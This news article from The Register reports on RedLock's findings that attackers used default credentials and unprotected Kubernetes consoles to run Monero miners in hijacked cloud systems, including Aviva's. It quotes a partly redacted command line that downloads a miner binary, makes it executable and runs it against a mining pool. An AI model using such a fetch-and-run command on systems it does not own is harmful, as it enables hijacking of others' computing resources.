Crypto-coin miners caught toiling away in hacked cloud boxes

Manic miners don't even pwn you: They just use default creds admins are too lazy to change

By Richard Chirgwin


Here's yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock's security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It's believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.

It's one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 Terawatt-hours, and it takes 215 kWH for a single transaction.

However, you'd be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such Coin Hive's spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva's case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone has automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva's server, with the same email recipient:

curl -L -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp:// -u -p x

Change those credentials, people. ®

Sign up to our NewsletterGet IT in your inbox daily


More from The Register

Chrome devs attempt to slip muzzle on resource-guzzling browser beast with 'Never-Slow Mode'

You either die a hero, or you live long enough to see yourself become the villain

Oh FNZ, Aviva! System back up, still trudging through queries backlog

2-day email turnarounds as users wail over payment lags

Aviva dumps DXC, shoves data centre support at Atos

Exclusive UK insurance bods find new bit barn bouncer

Microsoft's latest Windows 10 update downs Chrome, Cortana

Redmond, Google and Intel are desperately hunting for a fix

Judge bins sueball lobbed at Malwarebytes by rival antivirus maker for torpedoing its tool

Litigious security biz upset at blanket PC ban

Microsoft has another crack at fixing Chrome problems in Windows 10

SMB1 networking and Media Center content playback revived

Malwarebytes eats upstart

Google is 20, Chrome is 10, and Microsoft would rather ignore the Nokia deal's 5th birthday

Party poppers in Mountain View, party poopers in Redmond

Chrome 70 flips switch on Progressive Web Apps in Windows 10 – with janky results

Not quite the native experience Google's shooting for

Windows Store nixed Google Chrome 'app' hours after it went live

Installer merely redirected to the official source